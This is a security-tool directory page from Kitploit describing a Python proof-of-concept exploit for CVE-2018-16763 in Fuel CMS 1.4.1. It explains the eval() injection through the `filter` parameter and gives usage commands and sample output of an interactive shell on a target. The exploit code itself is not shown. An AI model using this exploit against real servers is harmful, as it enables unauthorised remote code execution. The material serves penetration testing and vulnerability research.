Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC — Python PoC for unauthenticated remote code execution in Fuel CMS 1.4.1 via the `filter` parameter, providing an interactive shell for command execution. | Kitploit
Tools/GitHubGitHub/estebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubestebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc

CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →

Python PoC for unauthenticated remote code execution in Fuel CMS 1.4.1 via the `filter` parameter, providing an interactive shell for command execution.

View Repository
135 months agoNot yet reviewed
Share

CVE-2018-16763 — Fuel CMS 1.4.1 Remote Code Execution (PoC)

Unauthenticated RCE vulnerability in Fuel CMS 1.4.1. The filter parameter in the /fuel/pages/select/ endpoint is passed unsanitized to a eval() call in the PHP backend, allowing arbitrary code execution via a crafted payload. Unlike blind injections, the output is reflected directly in the HTTP response, so no intermediate file is needed.


How it works

  1. Sends a GET request to /fuel/pages/select/ with a specially crafted filter payload that calls PHP's system() with the desired command.
  2. Parses the reflected output from the HTTP response using a regex pattern.
  3. Returns the command output directly to the interactive shell.

Requirements

  • Python 3
  • Install dependencies:
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

Usage

python3 exploit.py -t http://TARGET

Example:

$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit

References

  • CVE-2018-16763
  • EDB-47138

Credits

  • Discovery & original exploit: Syed Sheeraz Ali
  • Cleanup & interactive shell: Esteban Zárate
Download Tool